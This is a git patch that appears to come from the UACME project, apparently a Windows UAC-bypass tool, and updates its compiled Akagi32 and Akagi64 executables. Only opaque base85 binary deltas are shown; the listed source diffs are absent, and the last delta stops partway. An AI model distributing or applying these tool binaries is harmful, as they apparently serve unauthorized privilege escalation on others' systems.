From 2eaaa0bee2695f87f9a594114828413f67f69710 Mon Sep 17 00:00:00 2001
From: hfiref0x
Date: Wed, 8 Feb 2017 10:59:23 +0700
Subject: [PATCH] v 2.5.4 little update
---
 Compiled/Akagi32.exe | Bin 267776 -> 267776 bytes
 Compiled/Akagi64.exe | Bin 314880 -> 314880 bytes
 README.md | 6 +++---
 Source/Akagi/enigma0x3.c | 6 +++---
 Source/Akagi/main.c | 8 ++++++--
 UACME.sha256 | 8 ++++----
 6 files changed, 16 insertions(+), 12 deletions(-)
diff --git a/Compiled/Akagi32.exe b/Compiled/Akagi32.exe index 2afebb00392dd464e2d26d9aab6c3c8f84c6aba0..45ffa0b44bb2cf77d781d9f075de90c77b59caa0 100644 GIT binary patch delta 2739 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 
diff --git a/Compiled/Akagi64.exe b/Compiled/Akagi64.exe index 89b6238983a112aa8e72a6e737583fe3df603d97..13796fb6920a6839f766b8149a6619036f727a30 100644 GIT binary patch delta 11466 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 delta 11532 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 